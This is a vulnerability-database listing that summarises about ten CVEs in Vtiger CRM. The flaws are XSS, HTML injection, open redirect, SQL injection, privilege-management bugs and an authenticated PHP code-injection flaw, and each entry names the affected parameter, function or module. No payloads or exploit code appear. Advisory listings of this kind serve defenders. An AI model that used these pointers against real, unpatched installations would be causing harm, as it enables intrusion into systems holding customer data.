CVSS: 5.4EPSS: 0%CPEs: 1EXPL: 0CVE-2024-48119
https://notcve.org/view.php?id=CVE-2024-48119
14 Oct 2024 — Vtiger CRM v8.2.0 has a HTML Injection vulnerability in the module parameter. Authenticated users can inject arbitrary HTML. • https://okankurtulus.com.tr/2024/09/12/vtiger-crm-v8-2-0-html-injection-authenticated • CWE-79: Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') •
CVSS: 6.4EPSS: 0%CPEs: 1EXPL: 0CVE-2024-44776
https://notcve.org/view.php?id=CVE-2024-44776
29 Aug 2024 — An Open Redirect vulnerability in the page parameter of vTiger CRM v7.4.0 allows attackers to redirect users to a malicious site via a crafted URL. • http://vtiger.com •
CVSS: 10.0EPSS: 0%CPEs: 1EXPL: 0CVE-2024-44777 – vTiger CRM 7.4.0 Cross Site Scripting
https://notcve.org/view.php?id=CVE-2024-44777
29 Aug 2024 — A reflected cross-site scripting (XSS) vulnerability in the tag parameter in the index page of vTiger CRM 7.4.0 allows attackers to execute arbitrary code in the context of a user's browser via injecting a crafted payload. vTiger CRM version 7.4.0 suffers from multiple reflective cross site scripting vulnerabilities. • http://vtiger.com • CWE-79: Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') •
CVSS: 10.0EPSS: 0%CPEs: 1EXPL: 0CVE-2024-44778 – vTiger CRM 7.4.0 Cross Site Scripting
https://notcve.org/view.php?id=CVE-2024-44778
29 Aug 2024 — A reflected cross-site scripting (XSS) vulnerability in the parent parameter in the index page of vTiger CRM 7.4.0 allows attackers to execute arbitrary code in the context of a user's browser via injecting a crafted payload. vTiger CRM version 7.4.0 suffers from multiple reflective cross site scripting vulnerabilities. • http://vtiger.com • CWE-79: Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') •
CVSS: 10.0EPSS: 0%CPEs: 1EXPL: 0CVE-2024-44779 – vTiger CRM 7.4.0 Cross Site Scripting
https://notcve.org/view.php?id=CVE-2024-44779
29 Aug 2024 — A reflected cross-site scripting (XSS) vulnerability in the viewname parameter in the index page of vTiger CRM 7.4.0 allows attackers to execute arbitrary code in the context of a user's browser via injecting a crafted payload. vTiger CRM version 7.4.0 suffers from multiple reflective cross site scripting vulnerabilities. • http://vtiger.com • CWE-79: Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') •
CVSS: 7.2EPSS: 0%CPEs: 1EXPL: 0CVE-2024-42994
https://notcve.org/view.php?id=CVE-2024-42994
16 Aug 2024 — VTiger CRM <= 8.1.0 does not properly sanitize user input before using it in a SQL statement, leading to a SQL Injection in the "CompanyDetails" operation of the "MailManager" module. • https://www.shielder.com/advisories/vtiger-mailmanager-sqli • CWE-89: Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection') •
CVSS: 8.3EPSS: 0%CPEs: 1EXPL: 0CVE-2024-42995
https://notcve.org/view.php?id=CVE-2024-42995
16 Aug 2024 — VTiger CRM <= 8.1.0 does not correctly check user privileges. A low-privileged user can interact directly with the "Migration" administrative module to disable arbitrary modules. • https://www.shielder.com/advisories/vtiger-migration-bac • CWE-269: Improper Privilege Management •
CVSS: 8.1EPSS: 0%CPEs: 1EXPL: 1CVE-2023-46304
https://notcve.org/view.php?id=CVE-2023-46304
30 Apr 2024 — modules/Users/models/Module.php in Vtiger CRM 7.5.0 allows a remote authenticated attacker to run arbitrary PHP code because an unprotected endpoint allows them to write this code to the config.inc.php file (executed on every page load). module/Users/models/Module.php en Vtiger CRM 7.5.0 permite que un atacante remoto autenticado ejecute código PHP arbitrario porque un endpoint desprotegido le permite escribir este código en el archivo config.inc.php (ejecutado en cada carga de página) . • https://github.com/jselliott/CVE-2023-46304 • CWE-74: Improper Neutralization of Special Elements in Output Used by a Downstream Component ('Injection') •
CVSS: 9.0EPSS: 0%CPEs: 1EXPL: 1CVE-2023-38891
https://notcve.org/view.php?id=CVE-2023-38891
14 Sep 2023 — SQL injection vulnerability in Vtiger CRM v.7.5.0 allows a remote authenticated attacker to escalate privileges via the getQueryColumnsList function in ReportRun.php. Una vulnerabilidad de inyección SQL en Vtiger CRM v.7.5.0 permite a un atacante remoto autenticado escalar privilegios a través de la función getQueryColumnsList en ReportRun.php. • https://github.com/jselliott/CVE-2023-38891 • CWE-89: Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection') •
CVSS: 5.5EPSS: 0%CPEs: 1EXPL: 1CVE-2022-38335
https://notcve.org/view.php?id=CVE-2022-38335
27 Sep 2022 — Vtiger CRM v7.4.0 was discovered to contain a stored cross-site scripting (XSS) vulnerability via the e-mail template modules. Se ha detectado que Vtiger CRM versión v7.4.0, contiene una vulnerabilidad de tipo cross-site scripting (XSS) almacenado por medio de los módulos e-mail template • https://code.vtiger.com/vtiger/vtigercrm • CWE-79: Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') •